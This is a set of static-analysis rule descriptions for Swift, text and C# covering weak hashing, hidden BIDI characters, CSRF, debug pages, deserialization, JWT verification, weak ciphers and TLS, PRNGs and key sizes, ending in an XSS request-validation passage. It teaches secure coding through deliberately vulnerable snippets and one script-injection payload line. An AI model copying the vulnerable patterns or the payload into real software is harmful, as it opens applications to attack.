swift:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.md5() // Sensitive

Compliant Solution

import CryptoSwift

let bytes:Array<UInt8> = [0x01, 0x02, 0x03]
let digest = input.sha512() // Compliant

See

text:S6389

Using bidirectional (BIDI) characters can lead to incomprehensible code.

The Unicode encoding contains BIDI control characters that are used to display text right-to-left (RTL) instead of left-to-right (LTR). This is necessary for certain languages that use RTL text. The BIDI characters can be used to create a difference in the code between what a human sees and what a compiler or interpreter sees. An advisary might use this feature to hide a backdoor in the code that will not be spotted by a human reviewer as it is not visible.

This can lead to supply chain attacks since the backdoored code might persist over a long time without being detected and can even be included in other projects, for example in the case of libraries.

Ask Yourself Whether

  • This text requires a right-to-left writing system (to use Arabic or Hebrew words, for example).
  • The author of this text is a legitimate user.
  • This text contains a standard instruction, comment or sequence of characters.

There is a risk if you answered no to any of these questions.

Recommended Secure Coding Practices

Open the file in an editor that reveals non-ASCII characters and remove all BIDI control characters that are not intended.

If hidden characters are illegitimate, this issue could indicate a potential ongoing attack on the code. Therefore, it would be best to warn your organization’s security team about this issue.

Required opening BIDI characters should be explicitly closed with the PDI character.

Sensitive Code Example

A hidden BIDI character is present in front of return:

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then ⁧''' ;return
    bank[account] -= amount
    return

The executed code looks like the following:

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then <RLI>''' ;return
    bank[account] -= amount
    return

Compliant Solution

No hidden BIDI characters are present:

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then return; '''
    bank[account] -= amount
    return

See

csharpsquid:S2228

This rule is deprecated; use S106 instead.

Why is this an issue?

Debug statements are always useful during development. But include them in production code - particularly in code that runs client-side - and you run the risk of inadvertently exposing sensitive information.

Noncompliant code example

private void DoSomething()
{
    // ...
    Console.WriteLine("so far, so good..."); // Noncompliant
    // ...
}

Exceptions

The following are ignored by this rule:

  • Console Applications
  • Calls in methods decorated with [Conditional ("DEBUG")]
  • Calls included in DEBUG preprocessor branches (#if DEBUG)

Resources

csharpsquid:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.

The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be used only for information retrieval.

Sensitive Code Example

public void ConfigureServices(IServiceCollection services)
{
    // ...
    services.AddControllersWithViews(options => options.Filters.Add(new IgnoreAntiforgeryTokenAttribute())); // Sensitive
    // ...
}
[HttpPost, IgnoreAntiforgeryToken] // Sensitive
public IActionResult ChangeEmail(ChangeEmailModel model) => View("~/Views/...");

Compliant Solution

public void ConfigureServices(IServiceCollection services)
{
    // ...
    services.AddControllersWithViews(options => options.Filters.Add(new AutoValidateAntiforgeryTokenAttribute()));
    // or
    services.AddControllersWithViews(options => options.Filters.Add(new ValidateAntiForgeryTokenAttribute()));
    // ...
}
[HttpPost]
[AutoValidateAntiforgeryToken]
public IActionResult ChangeEmail(ChangeEmailModel model) => View("~/Views/...");

See

csharpsquid:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers.

The .Net Core framework offers multiple features which help during debug. Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage and Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage are two of them. Make sure that those features are disabled in production.

Use if (env.IsDevelopment()) to disable debug code.

Sensitive Code Example

This rule raises issues when the following .Net Core methods are called: Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage, Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage.

using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;

namespace mvcApp
{
    public class Startup2
    {
        public void Configure(IApplicationBuilder app, IHostingEnvironment env)
        {
            // Those calls are Sensitive because it seems that they will run in production
            app.UseDeveloperExceptionPage(); // Sensitive
            app.UseDatabaseErrorPage(); // Sensitive
        }
    }
}

Compliant Solution

using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;

namespace mvcApp
{
    public class Startup2
    {
        public void Configure(IApplicationBuilder app, IHostingEnvironment env)
        {
            if (env.IsDevelopment())
            {
                // The following calls are ok because they are disabled in production
                app.UseDeveloperExceptionPage(); // Compliant
                app.UseDatabaseErrorPage(); // Compliant
            }
        }
    }
}

Exceptions

This rule does not analyze configuration files. Make sure that debug mode is not enabled by default in those files.

See

csharpsquid:S5773

Why is this an issue?

During the deserialization process, the state of an object will be reconstructed from the serialized data stream which can contain dangerous operations.

For example, a well-known attack vector consists in serializing an object of type TempFileCollection with arbitrary files (defined by an attacker) which will be deleted on the application deserializing this object (when the finalize() method of the TempFileCollection object is called). This kind of types are called "gadgets".

Instead of using BinaryFormatter and similar serializers, it is recommended to use safer alternatives in most of the cases, such as XmlSerializer or DataContractSerializer. If it’s not possible then try to mitigate the risk by restricting the types allowed to be deserialized:

  • by implementing an "allow-list" of types, but keep in mind that novel dangerous types are regularly discovered and this protection could be insufficient over time.
  • or/and implementing a tamper protection, such as message authentication codes (MAC). This way only objects serialized with the correct MAC hash will be deserialized.

Noncompliant code example

For BinaryFormatter, NetDataContractSerializer, SoapFormatter serializers:

var myBinaryFormatter = new BinaryFormatter();
myBinaryFormatter.Deserialize(stream); // Noncompliant: a binder is not used to limit types during deserialization

JavaScriptSerializer should not use SimpleTypeResolver or other weak resolvers:

JavaScriptSerializer serializer1 = new JavaScriptSerializer(new SimpleTypeResolver()); // Noncompliant: SimpleTypeResolver is unsecure (every types is resolved)
serializer1.Deserialize<ExpectedType>(json);

LosFormatter should not be used without MAC verification:

LosFormatter formatter = new LosFormatter(); // Noncompliant
formatter.Deserialize(fs);

Compliant solution

BinaryFormatter, NetDataContractSerializer , SoapFormatter serializers should use a binder implementing a whitelist approach to limit types during deserialization (at least one exception should be thrown or a null value returned):

sealed class CustomBinder : SerializationBinder
{
   public override Type BindToType(string assemblyName, string typeName)
   {
       if (!(typeName == "type1" || typeName == "type2" || typeName == "type3"))
       {
          throw new SerializationException("Only type1, type2 and type3 are allowed"); // Compliant
       }
       return Assembly.Load(assemblyName).GetType(typeName);
   }
}

var myBinaryFormatter = new BinaryFormatter();
myBinaryFormatter.Binder = new CustomBinder();
myBinaryFormatter.Deserialize(stream);

JavaScriptSerializer should use a resolver implementing a whitelist to limit types during deserialization (at least one exception should be thrown or a null value returned):

public class CustomSafeTypeResolver : JavaScriptTypeResolver
{
   public override Type ResolveType(string id)
   {
      if(id != "ExpectedType") {
         throw new ArgumentNullException("Only ExpectedType is allowed during deserialization"); // Compliant
      }
      return Type.GetType(id);
   }
}

JavaScriptSerializer serializer = new JavaScriptSerializer(new CustomSafeTypeResolver()); // Compliant
serializer.Deserialize<ExpectedType>(json);

LosFormatter serializer with MAC verification:

LosFormatter formatter = new LosFormatter(true, secret); // Compliant
formatter.Deserialize(fs);

Resources

csharpsquid:S4564

This rule is deprecated; use S5753 instead.

Why is this an issue?

ASP.Net has a feature to validate HTTP requests to prevent potentially dangerous content to perform a cross-site scripting (XSS) attack. There is no reason to disable this mechanism even if other checks to prevent XXS attacks are in place.

This rule raises an issue if a method with parameters is marked with System.Web.Mvc.HttpPostAttribute and not System.Web.Mvc.ValidateInputAttribute(true).

Noncompliant code example

public class FooBarController : Controller
{
    [HttpPost] // Noncompliant
    [ValidateInput(false)]
    public ActionResult Purchase(string input)
    {
        return Foo(input);
    }

    [HttpPost] // Noncompliant
    public ActionResult PurchaseSomethingElse(string input)
    {
        return Foo(input);
    }
}

Compliant solution

public class FooBarController : Controller
{
    [HttpPost]
    [ValidateInput(true)] // Compliant
    public ActionResult Purchase(string input)
    {
        return Foo(input);
    }
}

Exceptions

Parameterless methods marked with System.Web.Mvc.HttpPostAttribute will not trigger this issue.

Resources

csharpsquid:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in Jwt.Net

Code examples

The following code contains an example of JWT decoding without verification of the signature.

Noncompliant code example

using JWT;

public static void decode(IJwtDecoder decoder)
{
    decoder.Decode(token, secret, verify: false); // Noncompliant
}
using JWT;

public static void decode()
{
    var jwt = new JwtBuilder()
        .WithSecret(secret)
        .Decode(token); // Noncompliant
}

Compliant solution

using JWT;

public static void decode(IJwtDecoder decoder)
{
    decoder.Decode(token, secret, verify: true);
}

When using JwtBuilder, make sure to call MustVerifySignature().

using JWT;

public static void decode()
{
    var jwt = new JwtBuilder()
        .WithSecret(secret)
        .MustVerifySignature()
        .Decode(token);
}

How does this work?

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

csharpsquid:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

using System.Security.Cryptography;

public void encrypt()
{
    var simpleDES = new DESCryptoServiceProvider(); // Noncompliant
}

Compliant solution

using System.Security.Cryptography;

public void encrypt()
{
    using (Aes aes = Aes.Create())
    {
        // ...
    }
}

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

csharpsquid:S4211

Why is this an issue?

Transparency attributes, SecurityCriticalAttribute and SecuritySafeCriticalAttribute are used to identify code that performs security-critical operations. The second one indicates that it is safe to call this code from transparent, while the first one does not. Since the transparency attributes of code elements with larger scope take precedence over transparency attributes of code elements that are contained in the first element a class, for instance, with a SecurityCriticalAttribute can not contain a method with a SecuritySafeCriticalAttribute.

This rule raises an issue when a member is marked with a System.Security security attribute that has a different transparency than the security attribute of a container of the member.

Noncompliant code example

using System;
using System.Security;

namespace MyLibrary
{

    [SecurityCritical]
    public class Foo
    {
        [SecuritySafeCritical] // Noncompliant
        public void Bar()
        {
        }
    }
}

Compliant solution

using System;
using System.Security;

namespace MyLibrary
{

    [SecurityCritical]
    public class Foo
    {
        public void Bar()
        {
        }
    }
}

Resources

csharpsquid:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

using System.Security.Cryptography;

public void encrypt()
{
    AesManaged aes = new AesManaged
    {
        keysize = 128,
        blocksize = 128,
        mode = ciphermode.ecb,        // Noncompliant
        padding = paddingmode.pkcs7
    };
}

Note that Microsoft has marked derived cryptographic types like AesManaged as no longer recommended for use.

Example with an asymmetric cipher, RSA:

using System.Security.Cryptography;

public void encrypt()
{
    RSACryptoServiceProvider RsaCsp = new RSACryptoServiceProvider();
    byte[] encryptedData            = RsaCsp.Encrypt(dataToEncrypt, false); // Noncompliant
}

Compliant solution

For the AES symmetric cipher, use the GCM mode:

using System.Security.Cryptography;

public void encrypt()
{
    AesGcm aes = AesGcm(key);
}

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

using System.Security.Cryptography;

public void encrypt()
{
    RSACryptoServiceProvider RsaCsp = new RSACryptoServiceProvider();
    byte[] encryptedData            = RsaCsp.Encrypt(dataToEncrypt, true);
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

csharpsquid:S4212

Why is this an issue?

Because serialization constructors allocate and initialize objects, security checks that are present on regular constructors must also be present on a serialization constructor. Failure to do so would allow callers that could not otherwise create an instance to use the serialization constructor to do this.

This rule raises an issue when a type implements the System.Runtime.Serialization.ISerializable interface, is not a delegate or interface, is declared in an assembly that allows partially trusted callers and has a constructor that takes a System.Runtime.Serialization.SerializationInfo object and a System.Runtime.Serialization.StreamingContext object which is not secured by a security check, but one or more of the regular constructors in the type is secured.

Noncompliant code example

using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security;
using System.Security.Permissions;

[assembly: AllowPartiallyTrustedCallersAttribute()]
namespace MyLibrary
{
    [Serializable]
    public class Foo : ISerializable
    {
        private int n;

        [FileIOPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
        public Foo()
        {
           n = -1;
        }

        protected Foo(SerializationInfo info, StreamingContext context) // Noncompliant
        {
           n = (int)info.GetValue("n", typeof(int));
        }

        void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
        {
           info.AddValue("n", n);
        }
    }
}

Compliant solution

using System;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security;
using System.Security.Permissions;

[assembly: AllowPartiallyTrustedCallersAttribute()]
namespace MyLibrary
{
    [Serializable]
    public class Foo : ISerializable
    {
        private int n;

        [FileIOPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
        public Foo()
        {
           n = -1;
        }

        [FileIOPermissionAttribute(SecurityAction.Demand, Unrestricted = true)]
        protected Foo(SerializationInfo info, StreamingContext context)
        {
           n = (int)info.GetValue("n", typeof(int));
        }

        void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
        {
           info.AddValue("n", n);
        }
    }
}

Resources

csharpsquid:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

These samples use TLSv1.0 as the default TLS algorithm, which is cryptographically weak.

using System.Net;

public void encrypt()
{
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls; // Noncompliant
}
using System.Net.Http;
using System.Security.Authentication;

public void encrypt()
{
    new HttpClientHandler
    {
        SslProtocols = SslProtocols.Tls // Noncompliant
    };
}

Compliant solution

Using System.Net;

public void encrypt()
{
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12 | SecurityProtocolType.Tls13;
}
using System.Net.Http;
using System.Security.Authentication;

public void encrypt()
{
    new HttpClientHandler
    {
        SslProtocols = SslProtocols.Tls12
    };
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

csharpsquid:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the System.Random class relies on a pseudorandom number generator, it should not be used for security-critical applications or for protecting sensitive data. In such context, the System.Cryptography.RandomNumberGenerator class which relies on a cryptographically strong random number generator (RNG) should be used in place.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Only use random number generators which are recommended by OWASP or any other trusted organization.
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

var random = new Random(); // Sensitive use of Random
byte[] data = new byte[16];
random.NextBytes(data);
return BitConverter.ToString(data); // Check if this value is used for hashing or encryption

Compliant Solution

using System.Security.Cryptography;
...
var randomGenerator = RandomNumberGenerator.Create(); // Compliant for security-sensitive use cases
byte[] data = new byte[16];
randomGenerator.GetBytes(data);
return BitConverter.ToString(data);

See

csharpsquid:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var RsaCsp = new RSACryptoServiceProvider(); // Noncompliant
}

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var DsaCsp = new DSACryptoServiceProvider(); // Noncompliant
}

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

using System;
using System.Security.Cryptography;

public void encrypt()
{
    ECDsa ecdsa = ECDsa.Create(ECCurve.NamedCurves.brainpoolP160t1); // Noncompliant
}

Compliant solution

using System;
using System.Security.Cryptography;

public void encrypt()
{
    var RsaCsp = new RSACryptoServiceProvider(2048);
}
using System;
using System.Security.Cryptography;

public void encrypt()
{
    var Dsa = new DSACng(2048);
}
using System;
using System.Security.Cryptography;

public void encrypt()
{
    ECDsa ecdsa = ECDsa.Create(ECCurve.NamedCurves.nistP256);
}

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms are mentioned directly in their names. For example, secp256k1 generates a 256-bits long private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Pitfalls

The KeySize Property is not a setter

The following code is invalid:

 ----
     var RsaCsp = new RSACryptoServiceProvider();
     RsaCsp.KeySize = 2048;
----

The KeySize property of CryptoServiceProviders cannot be updated because the setter simply does not exist. This means that this line will not perform any update on KeySize, and the compiler won’t raise an Exception when compiling it. This should not be considered a workaround.
To change the key size, use one of the overloaded constructors with the desired key size instead.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterpart.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.

Learn more here.

Resources

Articles & blog posts

Standards

csharpsquid:S5753

ASP.NET 1.1+ comes with a feature called Request Validation, preventing the server to accept content containing un-encoded HTML. This feature comes as a first protection layer against Cross-Site Scripting (XSS) attacks and act as a simple Web Application Firewall (WAF) rejecting requests potentially containing malicious content.

While this feature is not a silver bullet to prevent all XSS attacks, it helps to catch basic ones. It will for example prevent <script type="text/javascript" src="https://malicious.domain/payload.js"> to reach your Controller.

